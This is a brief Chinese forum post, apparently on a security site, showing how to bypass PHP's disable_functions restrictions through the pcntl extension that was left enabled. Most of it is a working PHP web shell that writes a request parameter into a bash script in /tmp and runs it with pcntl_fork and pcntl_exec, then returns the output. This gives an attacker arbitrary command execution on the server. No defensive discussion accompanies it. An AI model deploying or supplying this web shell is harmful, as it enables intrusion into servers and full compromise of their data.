大部分被禁用的是这些函数,然而泄露了一个pcntl
被禁用的函数(disable_functions): passthru exec system chroot chgrp
chown shell_exec proc_open proc_get_status popen
ini_alter ini_restore dl openlog syslog
readlink symlink popepassthru stream_socket_server

<?php

header("Content-Type: text/plain");

$cmd="/tmp/exec";
@unlink($cmd);
$c = "#!/usr/bin/env bash\n".$_GET[x]."> /tmp/output.txt\n";
file_put_contents($cmd, $c);
chmod($cmd, 0777);
$cd="/tmp/output.txt";
print_r(file_get_contents($cd));


switch (pcntl_fork()) {

  case 0:

    $ret = pcntl_exec($cmd);

    exit("case 0");

  default:

    echo "case 1";

    break;

}

点击收藏 | 3 关注 | 1
登录 后跟帖